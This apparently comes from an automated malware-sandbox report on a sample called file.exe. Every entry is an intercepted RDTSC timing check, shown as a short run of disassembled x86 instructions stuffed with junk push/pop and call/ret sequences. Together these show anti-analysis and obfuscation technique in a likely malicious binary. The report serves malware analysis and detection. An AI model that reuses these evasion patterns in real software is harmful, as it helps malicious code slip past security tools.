                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 46F282 second address: 46F2E3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jl 00007F7E2CEB1B16h 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e nop 0x0000000f push 00000000h 0x00000011 push esi 0x00000012 call 00007F7E2CEB1B18h 0x00000017 pop esi 0x00000018 mov dword ptr [esp+04h], esi 0x0000001c add dword ptr [esp+04h], 00000018h 0x00000024 inc esi 0x00000025 push esi 0x00000026 ret 0x00000027 pop esi 0x00000028 ret 0x00000029 jmp 00007F7E2CEB1B1Dh 0x0000002e push 00000000h 0x00000030 mov bh, dh 0x00000032 push 00000000h 0x00000034 push eax 0x00000035 push eax 0x00000036 push edx 0x00000037 pushad 0x00000038 pushad 0x00000039 popad 0x0000003a jmp 00007F7E2CEB1B28h 0x0000003f popad 0x00000040 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 46C450 second address: 46C456 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 46F2E3 second address: 46F2F2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F7E2CEB1B1Bh 0x00000009 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 46C456 second address: 46C460 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jne 00007F7E2CEC3D36h 0x0000000a rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 46F44F second address: 46F453 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 46F51C second address: 46F531 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 pushad 0x00000006 popad 0x00000007 ja 00007F7E2CEC3D36h 0x0000000d popad 0x0000000e popad 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 46F531 second address: 46F538 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 477770 second address: 477776 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 477776 second address: 477795 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007F7E2CEB1B28h 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 477795 second address: 47779B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 47779B second address: 4777A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 476EAC second address: 476EC3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push ebx 0x00000008 push edx 0x00000009 pop edx 0x0000000a pop ebx 0x0000000b pop ecx 0x0000000c jng 00007F7E2CEC3D6Bh 0x00000012 pushad 0x00000013 push ebx 0x00000014 pop ebx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 476EC3 second address: 476EE7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F7E2CEB1B16h 0x0000000a push edi 0x0000000b pop edi 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F7E2CEB1B23h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 476EE7 second address: 476EEB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 477066 second address: 47706A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 47706A second address: 47706E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 47706E second address: 477074 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 477074 second address: 477089 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 jnp 00007F7E2CEC3D36h 0x0000000d pop ebx 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 477089 second address: 47708D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 47708D second address: 477091 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 477091 second address: 47709D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F7E2CEB1B16h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 47709D second address: 4770AD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jg 00007F7E2CEC3D36h 0x0000000a jns 00007F7E2CEC3D36h 0x00000010 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4770AD second address: 4770B3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 47B83A second address: 47B840 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 47B840 second address: 47B87C instructions: 0x00000000 rdtsc 0x00000002 ja 00007F7E2CEB1B18h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jl 00007F7E2CEB1B1Ch 0x00000011 mov eax, dword ptr [esp+04h] 0x00000015 jmp 00007F7E2CEB1B1Fh 0x0000001a mov eax, dword ptr [eax] 0x0000001c jbe 00007F7E2CEB1B22h 0x00000022 jns 00007F7E2CEB1B1Ch 0x00000028 push eax 0x00000029 push edx 0x0000002a rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 47BB32 second address: 47BB38 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 47BB38 second address: 47BB3C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 47BB3C second address: 47BB7C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a jp 00007F7E2CEC3D4Fh 0x00000010 jne 00007F7E2CEC3D3Ch 0x00000016 popad 0x00000017 mov eax, dword ptr [esp+04h] 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 47BB7C second address: 47BB80 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 47BB80 second address: 47BB95 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7E2CEC3D41h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4826E7 second address: 4826ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4826ED second address: 4826F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4826F6 second address: 48270F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7E2CEB1B25h 0x00000009 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 481A62 second address: 481A86 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F7E2CEC3D36h 0x0000000a pop edx 0x0000000b jmp 00007F7E2CEC3D49h 0x00000010 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 481D32 second address: 481D36 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 481D36 second address: 481D4E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7E2CEC3D44h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 481EFF second address: 481F04 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 481F04 second address: 481F5B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F7E2CEC3D36h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pushad 0x0000000e jmp 00007F7E2CEC3D3Fh 0x00000013 pushad 0x00000014 jmp 00007F7E2CEC3D45h 0x00000019 jnc 00007F7E2CEC3D36h 0x0000001f popad 0x00000020 push eax 0x00000021 push edx 0x00000022 js 00007F7E2CEC3D36h 0x00000028 jmp 00007F7E2CEC3D45h 0x0000002d rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 482268 second address: 48226C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 48226C second address: 482293 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F7E2CEC3D49h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jnc 00007F7E2CEC3D36h 0x00000013 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 482535 second address: 48255D instructions: 0x00000000 rdtsc 0x00000002 je 00007F7E2CEB1B1Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F7E2CEB1B22h 0x0000000f jnp 00007F7E2CEB1B16h 0x00000015 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 48255D second address: 482561 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4879BF second address: 4879C5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4879C5 second address: 4879EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F7E2CEC3D3Eh 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F7E2CEC3D41h 0x00000012 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4879EC second address: 487A01 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 push ecx 0x00000009 pushad 0x0000000a popad 0x0000000b jnl 00007F7E2CEB1B16h 0x00000011 pop ecx 0x00000012 push edi 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 487A01 second address: 487A07 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 48BD7C second address: 48BD92 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7E2CEB1B1Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 48BD92 second address: 48BD98 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 48BF15 second address: 48BF37 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F7E2CEB1B16h 0x0000000a jmp 00007F7E2CEB1B21h 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 push ecx 0x00000013 pushad 0x00000014 popad 0x00000015 pop ecx 0x00000016 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 48BF37 second address: 48BF48 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jl 00007F7E2CEC3D36h 0x00000009 jg 00007F7E2CEC3D36h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 48C0FA second address: 48C115 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7E2CEB1B27h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 48C398 second address: 48C39E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 48C39E second address: 48C3A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 48C3A7 second address: 48C3AD instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 48C3AD second address: 48C3B7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jng 00007F7E2CEB1B16h 0x0000000a rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 48C3B7 second address: 48C3BD instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 48C973 second address: 48C97B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push edx 0x00000007 pop edx 0x00000008 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 48C97B second address: 48C98B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 pushad 0x0000000a push edi 0x0000000b pop edi 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 48C98B second address: 48C993 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 48C993 second address: 48C99B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 48CCB3 second address: 48CCB9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 48CCB9 second address: 48CCC4 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push edi 0x00000008 pop edi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 43E1F5 second address: 43E1F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 43E1F9 second address: 43E20F instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 jmp 00007F7E2CEC3D3Ah 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 43E20F second address: 43E21B instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 48D0EF second address: 48D12E instructions: 0x00000000 rdtsc 0x00000002 jno 00007F7E2CEC3D4Ah 0x00000008 jmp 00007F7E2CEC3D48h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jnp 00007F7E2CEC3D46h 0x00000015 pushad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 490996 second address: 4909AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 jmp 00007F7E2CEB1B1Dh 0x0000000c rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 41E732 second address: 41E73C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F7E2CEC3D36h 0x0000000a rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49516F second address: 49517E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop ebx 0x00000007 pushad 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a push edx 0x0000000b pop edx 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 494964 second address: 494968 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 494968 second address: 494980 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jns 00007F7E2CEB1B18h 0x0000000c pop edx 0x0000000d push ebx 0x0000000e jg 00007F7E2CEB1B1Ch 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4955B2 second address: 4955B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4955B8 second address: 4955EF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7E2CEB1B1Eh 0x00000007 jo 00007F7E2CEB1B16h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jno 00007F7E2CEB1B2Fh 0x00000015 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 495B6F second address: 495B79 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F7E2CEC3D3Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 499154 second address: 499164 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F7E2CEB1B16h 0x0000000a popad 0x0000000b push ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 499164 second address: 49916A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49916A second address: 49917E instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jmp 00007F7E2CEB1B1Bh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push edi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 454EBE second address: 454EC2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 454EC2 second address: 43D706 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7E2CEB1B1Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a mov dword ptr [esp], eax 0x0000000d cmc 0x0000000e lea eax, dword ptr [ebp+12479C26h] 0x00000014 jmp 00007F7E2CEB1B1Bh 0x00000019 push eax 0x0000001a pushad 0x0000001b jbe 00007F7E2CEB1B18h 0x00000021 jmp 00007F7E2CEB1B1Eh 0x00000026 popad 0x00000027 mov dword ptr [esp], eax 0x0000002a mov dword ptr [ebp+122D1D3Ch], edx 0x00000030 call dword ptr [ebp+122D3644h] 0x00000036 pushad 0x00000037 pushad 0x00000038 push ecx 0x00000039 pop ecx 0x0000003a pushad 0x0000003b popad 0x0000003c push eax 0x0000003d push edx 0x0000003e rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 455553 second address: 455561 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushad 0x00000006 jnc 00007F7E2CEC3D36h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4556B9 second address: 4556CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edi 0x00000008 pushad 0x00000009 jo 00007F7E2CEB1B16h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4556CA second address: 4556EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edi 0x00000006 mov eax, dword ptr [esp+04h] 0x0000000a push edi 0x0000000b jmp 00007F7E2CEC3D42h 0x00000010 pop edi 0x00000011 mov eax, dword ptr [eax] 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4556EF second address: 4556F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 455880 second address: 455886 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4559D7 second address: 4559DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4559DB second address: 455A5C instructions: 0x00000000 rdtsc 0x00000002 jg 00007F7E2CEC3D36h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b mov dword ptr [esp], eax 0x0000000e push 00000000h 0x00000010 push ebx 0x00000011 call 00007F7E2CEC3D38h 0x00000016 pop ebx 0x00000017 mov dword ptr [esp+04h], ebx 0x0000001b add dword ptr [esp+04h], 0000001Ah 0x00000023 inc ebx 0x00000024 push ebx 0x00000025 ret 0x00000026 pop ebx 0x00000027 ret 0x00000028 mov dx, D26Eh 0x0000002c mov ecx, dword ptr [ebp+122D291Bh] 0x00000032 push 00000004h 0x00000034 push 00000000h 0x00000036 push edx 0x00000037 call 00007F7E2CEC3D38h 0x0000003c pop edx 0x0000003d mov dword ptr [esp+04h], edx 0x00000041 add dword ptr [esp+04h], 00000018h 0x00000049 inc edx 0x0000004a push edx 0x0000004b ret 0x0000004c pop edx 0x0000004d ret 0x0000004e mov dword ptr [ebp+1244E46Eh], esi 0x00000054 cmc 0x00000055 nop 0x00000056 pushad 0x00000057 push ebx 0x00000058 push esi 0x00000059 pop esi 0x0000005a pop ebx 0x0000005b jnp 00007F7E2CEC3D38h 0x00000061 popad 0x00000062 push eax 0x00000063 jng 00007F7E2CEC3D42h 0x00000069 js 00007F7E2CEC3D3Ch 0x0000006f push eax 0x00000070 push edx 0x00000071 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 455E09 second address: 455E2B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7E2CEB1B1Ch 0x00000009 popad 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F7E2CEB1B1Eh 0x00000012 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 455E2B second address: 455E6A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push ebx 0x00000006 pop ebx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b push 00000000h 0x0000000d push edi 0x0000000e call 00007F7E2CEC3D38h 0x00000013 pop edi 0x00000014 mov dword ptr [esp+04h], edi 0x00000018 add dword ptr [esp+04h], 00000016h 0x00000020 inc edi 0x00000021 push edi 0x00000022 ret 0x00000023 pop edi 0x00000024 ret 0x00000025 sbb di, D61Eh 0x0000002a mov dx, 85D8h 0x0000002e push 0000001Eh 0x00000030 mov ecx, ebx 0x00000032 push eax 0x00000033 push eax 0x00000034 push edx 0x00000035 pushad 0x00000036 pushad 0x00000037 popad 0x00000038 push ecx 0x00000039 pop ecx 0x0000003a popad 0x0000003b rdtsc
